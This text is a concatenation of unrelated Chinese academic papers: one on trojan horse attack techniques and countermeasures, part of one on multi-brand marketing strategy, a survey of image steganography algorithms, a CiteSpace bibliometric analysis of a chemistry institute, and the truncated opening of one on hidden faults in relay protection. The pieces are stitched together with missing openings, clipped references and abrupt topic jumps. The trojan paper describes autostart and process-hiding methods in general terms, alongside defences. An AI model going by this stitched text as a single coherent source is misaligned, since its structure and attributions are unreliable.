Keywords:Network monitoring;Network attacks;Communication hidden;Firewall
一、引言
据公安部一份调查报道显示,我国近几年的计算机用户感染病毒、木马的比例连续多年都在80%以上。特洛伊木马(Trojan horse,简称木马)来源于古希腊神话,Dan Edwards将这一名称引入计算机领域。木马和病毒、蠕虫之类的恶意程序一样,具有很大的危险与破坏性。能够删除或修改文件、上传和下载文件、盗用客户信息等。这些年伴随着木马在通信隐藏、程序隐藏等方面的不断发展,对付其越来越具有了难度。本文针对木马及其一般攻击的方式进行分析,并且探讨应对措施。
二、典型的木马攻击方式
木马的攻击方式,在本文主要是知其如何地进行感染与渗透,并且进行自身的隐藏,以及进行资料的搜集或者破坏等活动。木马其攻击过程的一个典型过程如下:当服务器端在目标计算机上被执行后,这时木马程序开启默认的端口从而实现监听,而在客户机给服务器的程序发出链接请求要求时,就进行响应:有关程序开始运行实现对答客户机的应答,这样就建立了服务器端程序跟客户端之间的连接。建立链接以后,指令从客户端来发出,而服务器中则进行指令的分析与执行,并将数据传送到客户端,以达到控制主机的目的。
三、木马攻击方式重要技术分析
(一)目标的感染与植入
向目标主机成功植入木马是木马成功运行、发挥作用的前提。这一过程通常包含伪装、捆绑、漏洞利用等一切可能利用的技术手段。这个过程主要有:1.脚本种植技术。利用网页木马,网页木马就是当用户浏览某网页时,自动下载并运行某“木马”程序。2.利用脚本方式植入。通过ScriPt、Activex及AsP、cGI交互脚本的方式植入。3.利用系统漏洞植入。利用系统的其他一些漏洞进行植入。4.远程安装。通过一定的方法把木马执行文件传送到目标主机的电脑里再进行远程安装。
(二)自动加载
在自动加载过程,本身也是一个隐藏着的行为。这需要在操作系统启动的时候同步地启动自身,以此达到让木马在宿主机中自动运行的目的。常见的木马启动方式有:启动项加入注册表;win.ini和System.ini中的load节中添加启动项;Autoexe.bat中添加;修改Boot.ini的配置;修改Explorer.exe参数等等。
(三)进程隐藏以及文件隐藏
早期的木马进程的隐藏采取的措施比较简单,Windows9x系统要实现进程的隐藏可以通过把木马程序注册为服务的方式来达到。在Windows Nt/2000下,有些进程名字改得和系统进程非常相似,迷惑使用的人;也有的利用HOOK API技术修改函数的入口点欺骗列举本地进程的api函数;当然更好的是使用Rundll32.exe设计技术运行木马本身,这样在进程列表中显示出来的就是Rundll而非木马的可执行文件名,文件管理器中不能正确地列出木马的可执行文件。除了进程隐藏,还需要对静态文件的隐藏于保密,这里不赘述了。
总而言之,各怀鬼胎的木马通过以上隐秘的方式,实现了对计算机的攻击。
四、木马防范及应对
(一)意识层面
提高警惕,养成良好的习惯。时刻关注电脑运行的情况,当出现异常情况时如:系统自行运行文件、系统变慢、网络流量异常等,要提高警惕,查杀系统。养成良好的上网习惯,不要上一些有问题的网站,不要随意下载免费软件,不要随意打开邮件附件。
(二)技术层面
1.系统漏洞补丁的更新,及时为系统打上最新补丁。2.利用一些专杀工具。由于木马专杀工具往往对特点木马有非常好的效果,可以考虑周期性的进行应用。3.使用防火墙或者系统自带的功能如IP安全策略、端口筛选等,关闭系统特定端口,以阻断木马服务端与控制端的连接。
五、木马检测程序设计思路
对于一般使用者,可以积极采用4中所述的方法进行应对。对于更加专业的人员,可以根据木马的特点开发应对木马的工具。目前主要的木马检测方法都是对被人们已经发现的木马程序在在植入系统过程中及在系统中运行时的这些静态特征进行分析,提取出这些静态特征,构建木马的静态特征库,从而进行静态特征检测。但是这种方法强烈依赖于对木马的各种隐蔽和变化特征的深刻了解,所以检测能力不足,对未知的木马更是无能为力、有根本性的缺陷,更好的方法是应用对动态行为监测之方法。考虑到木马行为的隐蔽性和目的的恶意性,从这两点区别入手,用动态的方法控制木马植入、隐蔽和恶意操作行为所需要的资源条件,监控木马运行、通信、启动的隐蔽行为和恶意操作,对木马进行检测和防范。当然,也可以从动静两方面结合来进行木马的监测与阻隔。
这些行为的实施,更加有赖于对木马攻击方式的了解,要看到木马技术一直处于发展与升级的过程中,所以应对它也决不能丧失警惕,需要不断发现其攻击方式的新技术、新特征,从而提出更好的应对方法。
参考文献:
[1]周宗元,孔健行,武克南.线程插入技术的研究与防范[J].电脑知识与技术(学术交流),2007,17
二、多品牌策略的优点
多品牌策略在实践中屡见不鲜,多品牌策略的优点很多,主要有:
(一)多品牌具有较强的灵活性。没有一种产品是十全十美的,也没有一个市场是无懈可击的。浩瀚的市场海洋,为企业提供了许多平等竞争的机会,关键在于企业能否及时抓住机遇,在市场上抢占一席之地。见缝插针就是多品牌灵活性的一种具体表现。
(二)多品牌能充分适应市场的差异性。消费者的需求是千差万别的、复杂多样的,不同的地区有不同的风俗习惯;不同的时间有不同的审美观念;不同的人有不同的爱好追求,等等。
(三)多品牌有利于提高产品的市场占有率。多品牌策略最大的优势便是通过给每一品牌进行准确定位,从而有效地占领各个细分市场。如果企业原先单一目标顾客范围较窄,难以满足扩大市场份额的需要,此时可以考虑推出不同档次的品牌,采取不同的价格水平,形成不同的品牌形象,以抓住不同偏好的消费者。
多品牌策略不仅仅是企业满足消费需求的被动选择,也是企业制定竞争战略的主动选择。对市场攻击者和挑战者而言,其抢占市场的一个惯用伎俩就是发展出一个专门针对某一细分市场的品牌来逐渐蚕食;对市场领导者而言,与其坐等对手来占据某一细分市场,不如自己先发展出一个品牌去抢占,实施有效防御,从而锁定不同目标消费群。
三、多品牌策略的不足
当然,每个策略都不是完美的,多品牌策略也存在着缺陷,企业若在同一市场中发展多个品牌,成本成长的速度会比收入还快,在零售商与内部资源分配上,也会遇上复杂的管理难题。在推出一项品牌之前,企业通常会比较它们预期会产生的额外收入以及行销该品牌的成本。这类成本通常超乎主管的想像,因为“多品牌”策略有一项严重的限制;它会因不具规模经济而受害。一家公司会因在一个市场中推出数个品牌,而招致隐藏的成本,而且在事情发展超过某一点之后,就会有绑手绑脚之苦。
尽管隐藏成本的累积速度相当缓慢,但如果公司将太多品牌塞入这个产品类别,隐藏的成本就出现了。隐藏成本有四种可能呈现方式:
(一)成本重叠。当企业无法透过独一无二的方式为每一个品牌进行定位时,成本就会攀升。通常,品牌会在特色、属性或价格方面出现重叠,只是企业主管未意识到罢了。这些品牌彼此竞争的程度,和它们与对手品牌之间的竞争程度不相上下,而且最后通常演变为彼此互相吞噬。如此一来,公司成本的上升速度会比收入成长速度还快。
(二)效率不彰。很多公司已经运用自己的品牌开创出几项显然有利可图、但规模很小的利基。缺乏数量上的优势并未让他们的行销人员担心,因为他们力图达成的是整个品牌组合的销售最大化,而不是个别品牌的销售最大化。但是,这类的公司迟迟才了解,维持一大群品牌(而且每项品牌的运营规模都相对较小)的成本,相对而言,比推销几项大品牌的成本要高。例如,要制造各式各样的产品,工产方面需要大量的装备成本以及较长的机器停工时间,从而会导致较高的生产成本。
(三)零售商利润高昂。当企业推出多项品牌时,要为这些品牌取得零售上架空间,上架成本会高得让你不得不打退堂鼓。大型零售厂商,如美国的沃尔玛百货与欧洲的家乐福,一般在每项产品分类中只将前两大或前十大品牌上架。零售商运用领导品牌吸引顾客上门,但随后就向购物者推销自有品牌。
(四)管理难度加大。“多品牌”策略需要进行协调,包括从产品创新与包装改变,到经销商关系与零售商促销的。大型的品牌组合也需要经常进行价格变动与库存调整,这些工作会消耗所费不赀的管理资源。
此外,品牌扩增为企业带来最大成本的时候,不是现在,而是在未来。那些在市场中具有大型品牌组合的公司,经理人不断挂念在心的,往往是品牌之间的经费配置,而不是公司前途或有关竞争对手的问题。这类冲突的阴影常使企业组织挥之不去,让他们在面临更加专注的对手竞争时,显得脆弱不堪。
四、多品牌策略的应用
(一)明确品牌定位。定位意味着牺牲,意味着有所不为,而企业的扩张又希望无所不为。企业在完成资本积累开始对外扩张的过程中,若坚持统一品牌策略,让所有开发的新产品都套用原品牌,就会面临两难选择:若进行品牌延伸,尽管极为谨慎行事,采取了防范措施,但也可能出现品牌形象淡化、每一种产品都缺乏个性而被对手各个击破的风险;若放弃某些领域的品牌延伸,则意味着必须放弃一部分市场。要解决这一难题,一个可行的办法就是要采取产品定位的多品牌策略。
(二)建立内在相关性。品牌管理涉及到采购、生产、营销、财务、人力等各个环节。对多品牌企业而言,不能只关注单个品牌,而必须注意同一系列品牌之间的相互关联和影响。内在相关性主要是指,在实施多品牌策略时必须能够在几个品牌之间形成良好的资源整合和共享机制。任何一个企业的资源和精力都是有限的,因此为了充分利用企业的内外资源,可以成立完善的研发、采购公共平台,同时在渠道资源方面也实现良好的品牌互动和共享,并以完全不同的渠道策略来实现品牌间的良性竞争。品牌之间的高效整合与共享是欧莱雅取得成功的关键,其主要体现在技术和渠道这两个兼容性极强的方面。在技术方面,欧莱雅尽量发挥技术平台的相关效应。
(三)发挥企业品牌对多品牌策略的杠杆作用。多品牌策略中,品牌关系的管理还包括企业品牌和产品品牌之间关系的管理。企业品牌用于维护企业整体形象,对现有和潜在的员工来说,它是一种激励;对投资者而言,它意味着信心;对于产品品牌,它提供的是承诺。企业品牌代表的是企业的外部形象,对产品品牌有很强的杠杆作用。欧莱雅深知企业品牌的重要性,将其营销推广跨越个别产品线的产品品牌宣传,将光芒聚焦到企业品牌上来,最终形成一股激化不同产品品牌的能量。
综上所述,企业要使用多品牌策略进行市场竞争,需要注意多方面的内容。首先在品牌定位时要注意各品牌之间的关系,使各个品牌互相不冲突,并且协调各个品牌之间的内在关系,找出重点培育的品牌,以重点品牌促进其他品牌的发展,同时又需要防止那些做得不成功的品牌影响重点品牌的价值。在培育各个品牌的同时注意隐藏成本的增加,尽量减少隐藏成本,避免因为隐藏成本拖垮了各个品牌的扩张,做到了这些才能使企业的多个品牌健康地发展,使企业在竞争中获胜。
论文关键词:多品牌;品牌定位;品牌关系
论文提要单一品牌已越来越难以满足消费者的需求,实施多品牌策略成为众多企业竞争市场的手段。本文分析多品牌策略的概念、优点和缺点、使用范围、实践应用,希望对企业的品牌决策提供帮助。
主要参考文献:
中图分类号:TP391 文献标识码:A文章编号:1007-9599 (2011) 16-0000-02
Information Hiding Technology Research Based on Digital Image
Si Yingshuo,Yang Wentao,Zhang Sen
(Zhengzhou Institute of Aeronautical Industry Management,Zhengzhou450046,China)
Abstract:Security of information transmission is becoming more and more important along with the development of media digitized and network technology.In this paper,we mainly studied the information hiding technology based on digital images,and analyzed the advantages and disadvantages of spatial domain hiding algorithm and transform domain hiding algorithm.
Keywords:Digital Image;Information hiding;Spatial domain;Transform domain
一、信息隐藏的基本原理
信息隐藏技术通常使用文字、图像、声音及视频等作为载体,信息之所以能够隐藏在多媒体数据中,主要是利用了多媒体信息的时间或空间冗余性和人对信息变化的掩蔽效应。
(一)多媒体信息本身存在很大的冗余性,从信息论的角度看,未压缩的多媒体信息的编码效率是很低的,所以将某些信息嵌入到多媒体信息中进行秘密传送是完全可行的,并不会影响多媒体信息本身的传送和使用。(二)人的视觉或听觉感官系统对某些信息都有一定的掩蔽效应。在亮度有变化的边缘上,该边界“掩蔽”了边缘邻近像素的信号感觉,使人的感觉变得不灵敏、不准确,这就是视觉掩蔽效应[2]。通常人眼对灰度的分辨率只有几十个灰度级,对边缘附近的信息不敏感。利用这些特点,可以很好地将信息隐藏而不被觉察。
随着多媒体技术的迅速发展,图像成为信息表达的主要方式,数字图像大量存在,因而被研究最多的是图像中的信息隐藏,而且,图像信息隐藏所研究的方法往往经过改进可以轻易地移植到其他的载体中[1],是研究其他载体的隐藏算法的基础。因此,对基于数字图像的信息隐藏技术的研究成为了当前信息隐藏领域的一个研究热点。
二、基于数字图像的信息隐藏基础知识
(一)数字图像的概念。随着数字技术的不断发展和应用,许多信息都可以用数字形式进行处理和存储,数字图像就是以数字形式进行存储和处理的图像。数字图像可看作是平面区域上的二元函数Z=F(x,y),(x,y)∈R。在绝大多数情况下区域R是一个矩形。对R中任意的点(x,y),则F(x,y)代表图像的信息(如灰度值,RGB分量值等)。表示图像的二元函数有其特殊性,这就是相关性。在图像被数字化之后,Z=F(x,y)则相应于一个矩阵,其元素所在的行与列对应于自变量取值,元素本身代表图像信息。(二)数字图像信息隐藏模型。图像信息隐藏通过将秘密信息做适当的预处理后,利用合理的嵌入机制将信息隐藏在可公开的图像媒体信息中,达到传递秘密信息的目的,即信息隐藏将“正在通信”的事实隐蔽起来,从而逃过拦截者的破解。信息隐藏必然会引起载体图像一定的失真,如果失真过大就会被视觉感知,因此不可见性或者说不可感知性是衡量信息隐藏技术的重要标准。
图像信息隐藏将秘密信息隐藏或变换成另一非机密性的图像文件中,使得加入秘密信息的目标图像看起来难以察觉到有变化,这种隐藏的可能性除了来自于人眼视觉的掩蔽特性外,还有一个原因就是图像数据的数据冗余。图像数据中存在很多与有用信息无关的数据,即所谓的数据冗余,如果能够有效地利用这些冗余数据嵌入信息,就能达到很好的隐藏效果,图像信息隐藏的一般模型如图1所示:
图1:图像信息隐藏的一般模型
三、基于数字图像的信息隐藏算法
根据秘密信息嵌入域的不同,图像信息隐藏算法主要分为两大类:空域信息隐藏算法和变换域信息隐藏算法,二者在数据的嵌入原理上有根本的区别[3]。基于空域的信息隐藏算法通过直接改变图像某些像素的值来嵌入信息,具有较大的容量和较好的不可见性,但是安全性不高;基于变换域的信息隐藏算法通过改变某些图像变换域的系数来嵌入信息,变换域的方法在近来以至今后,都是信息隐藏算法的主流。
(一)空域信息隐藏技术。空域隐藏技术是指将秘密信息嵌入数字图像的空间域中,即对像素灰度值进行修改以隐藏秘密信息。
1.LSB算法。最低有效位(Least Significant Bits,LSB)方法是最早提出来的最基本的空域图像信息隐藏算法,许多其它的空域算法都是从它的基本原理进行改进扩展的,使得LSB方法成为使用最为广泛的隐藏技术之一。其原理是最不重要数据的调整对载体图像的影响很小,在视觉上无法察觉。LSB算法中,载体图像的LSB平面先被置0,然后根据要嵌入的秘密数据修改为“1”或不变,直至嵌入完成。嵌入数据后,载体图像部分像素的最低一个或多个位平面的数值被秘密信息所替换。
LSB算法每个像素点可以隐藏一比特、两比特甚至三比特的信息,达到了一个较大的隐藏容量及较好的不可见性,随机间隔法选择嵌入位置提高了算法的秘密性,这些特点为信息隐藏算法的研究提供了一定的参考。但是,LSB算法鲁棒性较差,给应用带来了一定的限制。
2.Patchwork算法。另一种空域信息隐藏算法是Bender等提出的直接扩频隐藏算法Patchwork。扩频算法为图像像素添加噪声,并且不需要改变噪声的统计特征就可以在每个噪声成分中隐藏一个比特。算法步骤如下:(1)用一个密钥K初始化一个伪随机数发生器;(2)根据随机数发生器的输出,随机选取n个像素对,其灰度值表示为(ai,bi);(3)令 ,完成信息嵌入。检测时,假设检验被用来证实秘密信息的存在。令(2.1)
如果 ,判定秘密信息存在。
Patchwork的检测方法基于如下统计假设:图像中随机选取的像素,其灰度值是独立同分布的。如果在一副图像中随机选取像素对,则统计量S的期望值为
(2.2)
对于已知位置的像素对,S≈2n。
Patchwork算法改进了LSB算法改变图像统计特性的不足,但是隐藏容量较小,容易受到各种综合攻击的影响,只能应用在某些需要嵌入少量信息的场合。为了增加算法的鲁棒性,一种改进的方法是将图像分块后,再嵌入秘密信息,算法的鲁棒性和不可见性都会增加。
总的来说,空域信息隐藏算法具有较好的不可见性和较高的隐藏容量,计算速度快,但鲁棒性较差,对于载体图像的压缩、噪声扰动等攻击的抵抗力较弱,很多研究更倾向于基于变换域的信息隐藏算法。
(二)变换域信息隐藏技术
变换域隐藏技术就是指将秘密信息嵌入数字图像的某一变换域中。比较常用的是离散傅立叶变换(DFT)、离散余弦变换(DCT)和离散小波变换(DWT)等,它们主要是通过修改载体图像某些指定的频域系数来嵌入数据。其基本思想是利用扩频通信原理来提高隐藏系统的鲁棒性。考虑到对低频区域系数的改动可能会影响到载体图像的感知效果,而高频系数又易被破坏,因此,信息隐藏技术一般选取载体图像中频区域上的系数来嵌入秘密数据,从而使之既满足不可感知性,又满足对诸如失真压缩等操作的鲁棒性。
1.基于DFT的数字图像隐藏算法。基于DFT的数字图像隐藏算法将图像分割成多个感觉频段,然后选择合适部分来嵌入秘密信息。文献[4]提出基于原始图像的傅立叶变换,将调制后的秘密信息依次加入到某些固定位置的幅值谱上,文献[5]利用傅里叶变换的可加性和图象去噪原理提出了一种基于频域的三维运动盲水印算法。傅里叶变换具有一些变换无关的完整特性。例如:空间域的平移只引起频域上的相移,而幅度不变;空间域尺度的缩放会引起频域尺度反向的缩放;空间域旋转的角度和所引起的频域的旋转的角度是一致的。这些特点可以抵御诸如旋转、尺度、平移等几何攻击。2.基于DCT的数字图像隐藏算法。基于DCT域的图像信息隐藏算法的一般步骤为,首先对载体图像分块进行二维DCT变换,然后用秘密信息对DCT系数进行调制,最后对新的系数作离散余弦反变换(IDCT),即可得到隐藏图像,完成信息隐藏过程。基于DCT的信息隐藏算法因其具有较强的鲁棒性,计算量较小,且与国际图像压缩标准(JPEG,MPEG,H.263,H,264等)相兼容(这些标准中均采用DCT变换),因而具有诸多的潜在优势,成为近年来研究最多的一种信息隐藏技术
3.基于DWT的数字图像隐藏算法。基于DWT域的图像信息隐藏算法的一般步骤为,首先对载体图像进行多级离散小波变换,得到不同分辨率下的细节子图和逼近子图,然后用秘密信息对DWT系数进行调制,最后对嵌入秘密信息后的小波系数进行相应级别的离散小波逆变换,完成信息隐藏过程。利用小波变换把原始图像分解成多频段的图像,能适应人眼的视觉特性且使得信息的嵌入和检测可分多个层次进行,小波变换域信息隐藏方法兼具时空域和DCT变换域方法的优点。因此,基于离散小波变换的信息隐藏算法已经成为当前研究的热点和最重要的研究方向。目前,常见的几类小波变换域信息隐藏嵌入算法有:非自适应加性和乘性嵌入方式、基于量化的嵌入方式,基于自适应嵌入方式、基于多分辨率嵌入方式。此外,还有基于替换的嵌入方式,基于树结构的嵌入方式等等。
由于变换域信息隐藏技术是在频域嵌入信息,因此它有频域所固有的抗攻击和变换的能力,使这一隐藏方案对比例变化、JPEG压缩、抖动、剪辑、打印/扫描以及合谋攻击都具有很好的鲁棒性。它的优点体现在以下几点:(1)在变换域中嵌入的信号能量可以分布到空间域的所有像素上,有利于保证秘密信息的不可见性;(2)在变换域中,人类视觉系统的某些特性(如频率掩蔽效应)可以更方便的结合到秘密信息编码过程中,提高算法的鲁棒性;(3)交换域方法与大多数国际数据压缩标准兼容,从而可以直接实现压缩域内的隐藏算法,提高效率,同时,也能抵抗相应的有损压缩。
四、结束语
信息隐藏在信息安全、电子商务、军事、医疗系统、国家情报等方面有着非常重要的意义,正是由于它广泛的应用和重要的地位,使信息隐藏的研究成为科学研究的热点之一。
基于图像的信息隐藏技术具有载体数字图像的一些自身特点,同时具备信息隐藏技术的共性,以图像为载体的信息隐藏技术是信息隐藏研究的一个重要分支。本文主要介绍以数字图像为载体的信息隐藏技术,主要以信息隐藏算法的一般流程为依据,阐述了信息隐藏的基本概念,归纳了信息隐藏的一般模型、基本方法,并分析、总结了该领域的常见经典算法,为下一步的深入研究奠定了坚实的基础。
参考文献:
[1]徐献灵.基于数字图像的信息隐藏技术及其应用[D].中山大学硕士毕业论文,2007
[2]黄爱民,安向京,骆力.数字图像处理与分析基础[M].北京:中国水利水电出版社,2005
[3]王丽娜,张焕国,叶登攀.信息隐藏技术与应用(第二版)[M].武昌:武汉大学出版社,2009
在全球化知识经济环境下,作为支撑一流科技创新的院所文献情报系统,不仅要面对未来不断创新的数字科研、e-learning环境和学科领域的交叉与飞速发展,满足科研用户对e-science学术信息利用环境不断提高的需求,而且要有快速收集有效的文献数据信息,利用文献情报分析工具,发掘隐藏在数据背后知识内涵和情报的能力,以满足战略决策者对研究机构的科研产出和发展态势情报的需求。
信息可视化(informaiton visualization,InfoVis或Iv)是近年来出现的数据挖掘方法之一,它能很好地利用人类对可视化形式下的模型和结构的获取能力,解决科技文献数据量过大、无法快速和有效交流的问题,同时可视化数据挖掘可观察、筛选、发现和理解信息,发现隐藏在数据和信息背后的含意[1]。
本文以开展基础研究为主,有重点地开展国家急需的、有重大战略需求的高技术创新研究,并与高新技术应用和转化工作相协调发展的多学科、综合性研究所――中国科学院化学所(以下简称化学所)作为研究机构的实例,以化学所近5年(2004-2008年)被科学引文索引数据库(SCIE)收录的国际论文为科研产出指标,利用SCIE分析功能,结合近年出现的信息可视化数据挖掘软件――citespace,对收录的科学文献全纪录数据进行统计和可视化分析。在传统的对相关信息文献计量分析的基础上,更加注重利用citespace软件对论文题目、摘要、关键词、标示符等数据提取词集,从引文数量、共现和共引的频次多方面进行聚类计算,发现隐藏在可视化数据背后的有价值情报。
1 方法与数据源
1.1 方法
采用美国Drexe1大学陈超美博士开发的基于JAVA平台的citespace在线可视化软件,该软件是一种适于多元、分时、动态的复杂网络分析的新一代信息可视化技术。使用citespace 的一般步骤:①确定一个研究领域或研究机构,收集尽可能多的文献;②收集数据, 包括题目、摘要、被引文献等信息的文献全纪录信息;③参数选择:确定总的时间段范围和时间分区;选择分析的节点类型;引文数量、共被引频次和共被引系数三个层次上分别设定阈值;选择算法精简和合并网络;④显示可视化图谱;确定关键点。
citespace可用于进行科学文献全记录数据共引网络分析,通过对文献信息的可视化,能够较为直观地识别研究机构科研产出发展态势的情报[2]。
1.2 数据源
选择美国科学情报研究所ISI(International for Scientific Information)创建的SCIE数据库为数据源,检索策略为:地址= inst chem* same (chin* aca* or acta*) same beijing),出版年=2004-2008,检索结果命中记录4 065条,引文数据138 586条,总被因频次为38 053次。将2004-2008年间化学所发表的4 065篇论文的作者、题目、主题词、关键词、文献的引文等全纪录信息导入citeSpace软件,采用SCIE的分析功能和citespace软件 ( 2009年3月20日2.2. R1 Webstart版本[3])进行年代分布、合作者、学科领域、合作机构、合作国家、期刊共引、作者共引信息分析,绘制网络可视化图谱。
2 化学所情况分析
2.1 年代分布
SCIE收录的2004-2008年间化学所的数量和论文被引频次分布结果如图1所示:
在2004-2008年5年间,化学所论文数量保持平稳增长,年均数量约800篇;但是5年间的被引频次从2004年的186次,猛增到2008年的12 805次,呈逐年大幅度增长的趋势,被引频次的提高表明化学所的质量有了显著的提高。通过SCIE引证检索结果的数据:化学所论文年平均被引频次达到6 604.67,篇平均被引频次为9.36,h指数为66,进一步反映化学所2004-008年5年在国际科学研究领域的影响力显著加强。
2.2 化学所论文合著者分布(co-authors network)
利用citespace软件对2004-2008年间化学所的合著者网络图谱进行分析,选择使用关键路径(pathfinder)算法,网络节点确定为作者,时间区选择为1年,阈值为(6,6,40),(8,8,40),(10,10,40)。图谱中不同大小和不同颜色的圆环组成的作者年轮来表示合著者频次(freq)和合著年份[4]。如图2、表1所示:
从图2、表1中可以清晰地看出,2004-2008年化学所的论文合著者中合著频次高于100次的有7人,其中,合著频次位于前5位的分别是:Zhu DB院士、Jiang L研究员、Han BX研究员、Liu YQ研究员和Li YL研究员。对论文合著者进行聚类分析,可以看出图谱可以聚为6大类,6大类中合著频次最高的作者分别是由Zhu DB院士、Jiang L研究员、Han BX研究员、Wan LJ所长、Wan LJ研究员和Li YF研究员,因此通过化学所论文合著者的网络图谱分析,可以清楚地了解化学所研究领域的学科带头人及其研究团队的分布。
2.3 化学所论文学科领域分布(co-occurring subject category )
利用citespace软件对1995-2008年化学所共现学科领域进行分析,选择使用关键路径算法,网络节点确定为学科领域,时间区选择为1年,阈值为(2,2,5),(3,3,5),(3,3,20)。图谱中不同大小和不同颜色的圆环组成的学科领域年轮表示学科领域的共现频次和共现年份,用不同颜色的连线来表示学科领域间共现的年代。如图3、表2所示:
从图3、表2中可以看出,在化学所论文共现学科领域中,共现频次大于20次的学科领域有16个,其中化学、聚合物科学、物理、材料科学、纳米科学及纳米技术位于与化学所共现学科领域的前5位。
2.4 与化学所共作者的机构分布(network of co-authors institutes)
利用citespace软件对2004-2008年与化学所共作者的机构网络图谱进行分析,选择使用关键路径算法,网络节点确定为机构,时间区选择为1年,阈值为(2,2,5),(3,3,5),(3,3,20)。图谱中不同大小和不同颜色的圆环组成的机构年轮来表示机构与化学所共作者频次和共作者年份。如图4、表3所示:
从图4、表3中可以看出,在与化学所共作者的机构中,中科院的节点(freq=3 718)远远大于其他机构,说明化学所与中科院内的共作者者频次最高。还可以看出共作者频次大于30次的机构有14个,其中北京大学、武汉大学、山东大学、清华大学、吉林大学位于与化学所国内共作者的前5位,值得注意的是德国Max Planck Inst Colloids & Interfaces的合作位居第10位,说明化学所与该机构的合作十分紧密。
2.5 与化学所共作者的国家分布(network of co-authors countries)
利用citespace软件对2004-2008年与化学所共作者的国家网络图谱进行分析,选择使用关键路径算法,网络节点确定为国家,时间区选择为1年,阈值为(2,2,3),(2,2,3),(3,3,5)。图谱中不同大小和不同颜色的圆环组成的国家年轮来表示国家与化学所的共作者频次和共作者年份。如图5、表4所示:
从图5、表4中可以看出,在与化学所共作者的国家中,中国的节点(freq=3 931)远远大于其他国家,说明化学所与国内共作者的频次最高。还可以看出与化学所共作者的频次大于10次的国家有9个,其中美国、德国、日本、加拿大、英国位于与化学所合作的前5位。
2.6化学所期刊共引分析(journal co-citation network)
利用citespace软件对2004-2008年化学所期刊共引进行分析,选择使用关键路径算法,网络节点确定为期刊,时间区选择为1年,阈值为(30,30,30),(30,30,30),(30,30,40)。图谱中不同大小和不同颜色的圆环组成的期刊年轮来表示期刊的共引频次和共引年份,用不同颜色的连线来表示期刊间共引的年代。如图6、表5和表6所示:
从图6、表5、表6中可以清晰地看出,目前化学所使用的核心期刊中有9种期刊的共引频次高于1 000,其中,期刊共引频次位于前5位的分别是:《科学》、《自然》、《物理化学杂志B》、《先进材料》、《化学评论》。尤其值得注意的是SCIE数据库中化学所发文量位于前5位的期刊分别是:《物理化学杂志B》、《应用聚合物科学》、《聚合物》、《大分子》、《兰格缪尔》,与期刊共引频次排在前5位的有所不同,因此,在关注学科领域核心期刊的时候,来源期刊发文量和共引频次排名居前列的期刊都应该是重点关注的期刊。通过化学所期刊共引网络图谱中期刊共引频次的分析,能够更快速、直观地了解化学所的核心期刊分布。
2.7 共词分析(network of co-occuring phrases)
利用citespace软件对2004-2008年化学所文献共词和突现词进行分析,选择使用关键路径算法,网络节点确定为关键词,时间区选择为1年,阈值为(10,10,20),(10,10,20),(10,10,20)。图谱中不同大小和不同颜色的圆环组成的年轮来表示关键词的共现频次和共现年份,用不同颜色的连线来表示关键词间共现的年代。最外层紫色圈突出显示表示共词中心性(centrality),即在整体网络中所起连接作用大小。软件还会根据某段时间内关键词共现频次,将变化率高的词从大量的主题词中探测出来,称为突现词,用红色字显示。如图7、表7所示:
从图7、表7中可以清晰地看出,化学所论文共现词,频次高于100的关键词有21个,其中被引频次位于前5位的分别是:聚合物(polymers)、形态学(morphology)、纳米粒子(nanoparticles)、膜(films)和衍生物(derivatives)。通过高频出现的关键词在共词网络图谱中展示的共现频次,在一定程度上揭示了化学所的热点研究方向。
3 小 结
本文通过绘制化学所的合作者、学科领域、合作机构、合作国家、期刊共引和文献共词的可视化图谱,以图谱方式揭示了化学所近5年发展过程中起关键作用的学科带头人、重点学科、核心期刊、研究热点等信息情报。目的在于通过研究机构文献计量的可视化分析方法,探索深度挖掘研究机构内部的重点学科领域分布、合作团队及学科领军人物、研究机构外部的合作研究机构及合作国家的分布以及研究机构的热点研究方向等情报的方法,在满足科研用户学术信息查找利用需求的同时,为研究所制定战略规划、提升国际竞争能力提供有价值的情报,从而进一步提升学科馆员融入研究所科研一线的知识化服务能力。
参考文献:
[1] Chaomei C.Searching for intellectual turning points:Progressive knowledge domain visualization.Proceedings of the National Academy of Sciences of the United States of America,Washington:US National Academy of Sciences,2004,101(Supp1.1):5303-5301.
[2] 刘则渊. 科学知识图谱:方法与应用. 北京:人民出版社,2008.
中图分类号:F407文献标识码: A
所谓继电保护是指对电力系统中发生的故障或异常情况进行检测,针对相应的检测情况来发出相应的报警信号,或者直接将系统中的故障部分进行相关隔离和切除的一种重要措施。当电力系统中由于自然的、人为的或设备故障等因素发生故障时,继电保护装置必须能够及时快速的把系统故障进行有效切除,从而来保证电力系统的安全运行稳定,最大限度的降低故障引起的人生伤害和财产损失。
继电保护系统的隐藏故障是指继电保护装置中存在的一种永久缺陷,这种缺陷只有在系统发生故障等不正常运行状态时才会表现出来,其直接后果是导致被保护元件的错误断开。多次大停电事故的分析结论表明,这种由于继电保护装置的隐藏故障引起的大停电事故发生概率虽然很小,但危害极大,这类事故一旦发生将会引起电网的连锁反应,事故并会迅速蔓延导致电网崩溃,给电网带来灾难性的后果。
随着电网发展规模的不断扩大,电网的安全运行显得尤为重要,隐藏故障依然是威胁电网安全的主要隐患之一。因此开展对继电保护隐藏故障的研究具有重要的理论和现实意义。
1 继电保护隐藏故障的概述
继电保护主要是指在电力系统发生故障或是出现异常情况的时候对其进行检测,并根据相应的检测情况发出报警信号或是直接进行处理的一种电力保护措施。继电保护的主要作用就是在电力系统出现自然的、人为的或是设备故障等故障的时候能够及时、准确的将故障切断,以保护电力系统的安全运行,最大限度的降低损失。继电保护系统主要包括有继电保护装置、通讯通道、电压电流互感器以及断路器,其中任何一个部分出现故障都会造成继电保护系统的故障。继电保护系统隐藏故障主要是指继电保护系统内部元件存在着的一种永久缺陷,这种缺陷在系统正常运行的情况下是不会对系统造成影响的,而在系统不正常运行的状态下这种缺陷就会表现出来,并导致一连串的故障发生,最为直接的后果就是导致被保护的元件出现错误断开的情况。虽然继电保护隐藏故障造成大面积停电的机率很小,但是其危害却是极大的,这样的事故一旦发生就会引起一连串的连锁反应,甚至可能使电网崩溃。
2 继电保护隐藏故障的监测
